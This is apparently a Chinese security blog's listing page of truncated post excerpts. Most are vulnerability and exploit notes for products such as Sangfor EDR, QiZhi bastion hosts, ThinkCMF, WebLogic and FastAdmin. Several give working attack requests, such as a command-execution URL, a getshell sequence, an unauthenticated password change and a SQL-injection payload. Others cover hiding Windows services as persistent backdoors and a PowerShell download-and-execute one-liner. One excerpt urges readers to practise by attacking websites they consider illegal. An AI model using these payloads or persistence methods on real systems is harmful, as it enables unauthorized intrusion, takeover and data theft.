蓝队技巧:查找被隐藏的Windows服务项

在上篇,我们说过红队技巧:隐藏windows服务,今天抽空来更新下,如何查找这类隐藏的Windows服务项。 首先看下效果,使用powershell远程下载执行直接获得隐藏的Windows服务名称: 通过远程下载执行无文件落地查看隐藏Windows服务: powershell -c "IEX (New-Object Net.WebClient)....
关注web安全、热爱黑客技术
在上篇,我们说过红队技巧:隐藏windows服务,今天抽空来更新下,如何查找这类隐藏的Windows服务项。 首先看下效果,使用powershell远程下载执行直接获得隐藏的Windows服务名称: 通过远程下载执行无文件落地查看隐藏Windows服务: powershell -c "IEX (New-Object Net.WebClient)....
在后渗透测试中,我们拿到了目标机器的权限后,要想办法维持权限,保持持久,嗯,很重要,不管生活还是工作都需要持久! 利用windows服务来植入我们的后门也是一种常见的利用方式,但是往往一般植入的服务很容易被管理员在任务管理器看到。如果可以隐藏的话,就大大提高了我们的持久性,今天就介绍下一种利用powershell来进行隐藏windows服务的技巧...
web安全 74cms ActiveMQ Adminer Adobe ColdFusion Apache Apache Dubbo Apache FusionAuth Apache HTTPD Apache Log4j Apache SS...
0x1.简介 FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。 补天平台介绍:近日,补天漏洞响应平台监测到互联网上出现Fastadmin文件上传漏洞,exp被公开。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题,可导致文件上传并解析为可执行文件。目前厂商已发布新版本修复此漏洞,补...
https://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1 注意 需要登录之后才可以阅读全文>...
0x01 更新概览 2020年09月14日,360CERT监测发现 secura 公开了针对该漏洞研究报告及PoC,可造成 权限提升影响。本次更新标识该漏洞的利用工具公开,并可能在短时间内出现攻击态势。 具体更新详情可参考: 漏洞验证 0x02 漏洞简述 2020年08月12日, 360CERT监测发现 W...
泛微0A的这个漏洞利用/wxjsapi/saveYZJFile接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。 1、downloadUrl参数修改成需要获取文件的绝对路径,记录返回包中的id值。 2、通过查看文件接口访...
无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。 POST /?module=auth_user&action=mod_edit_pwd ...
齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835) 未授权无需登录。 1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 "OK". 2、访问如下链接即可getshell,执行成功后,生成PHP一句话马 3、/var/ww...
用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。 该系统被曝存在命令执行漏洞,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击,漏洞细节以及相关漏洞poc如下: ...
背景: 绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全。 绿盟综合威胁探针设备版本V...
HW礼盒,请查收:深信服edr RCE:https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 即可执行命令,除上面之外,还有任意文件读取,验证码绕过,还有就是rce。任意用户登录:注:2020年08月18日,fofa是通杀,版本小于 3.2.19fofa指纹: title="SANGFOR...
前台SQL注入: 需要普通用户权限,默认可注册 paylaod: POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1 Host: localhost Connection: close Cookie: PHPSESSID=kcg5v...
0x00 简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的开源中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应...
0x00背景介绍 WinRAR,是Windows标配的压缩软件,大家都不陌生。0x01漏洞描述 但是最近这两天winrar 5.80爆出了两个漏洞,一个是XML注入漏洞,一个是拒绝服务攻击漏洞。0x02漏洞复现POC 第一个XML注入漏洞: 此poc展示非授权情况下用户敏感文件上传 这里的文件是:C:\Windows\sy...
0x1.背景 首先,CNVD收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。 0x2.漏洞描述 攻击者利用该漏洞,可在未授权的情况下远程执行命令。从相关信息来看。 部分版本WebLogic中默认包含的wls9_async_response包,为We...
0x1 简单介绍: X Server 是绝大对数Linux发行版和Unix系统的基础图形界面程序,是系统标配。而此程序也是以Root权限启动的,因而成功溢出它而获得的shell,也是root权限。 0x2 漏洞相关信息 # 时间: 2019-10-16 # 作者: Marcelo Vázquez (s4vitar) # 厂商: http...
注意:所有的过程仅供渗透学习研究参考,禁止用于他途。 建议学习渗透的朋友搜索一些非法网站的关键词来进行实战练习!干爆他们! 0x1 背景: 在朋友圈发现小姨转发了一篇XXX中奖,打开一开是XX彩票,其实就是菠菜的皮,果断先劝小姨删掉这条朋友圈,就有了下面这篇文章: 0x2 信息搜集: 发现目标系统是dedecms,且为windows系...
ThinkPHP 的站,且存在 ThinkPHP 5.0.x 远程命令执行漏洞,并且开了 debug 模式,但是⽬标用的是ThinkPHP5.0.20,⼀开始⽤网络上的 poc 打怎么都不成功。 第一个问题是,目标 PHP 禁⽤了命令执行的函数,比如执行 system 提示 disabled: 不过看起来文件函数没有禁用,⽐如 file_g...
今天到处逛博客看到一个新(旧)闻:WordPress4.9.2(含)以前的网站含有DoS漏洞,可以用一台电脑轻松down掉网站。来源链接; CVE;PoC (这个POC只适合python2.7+,python3,并不适合,我作了修改使其能在python3上执行,地址:https://github.com/Mr-xn/CVE-2018-63...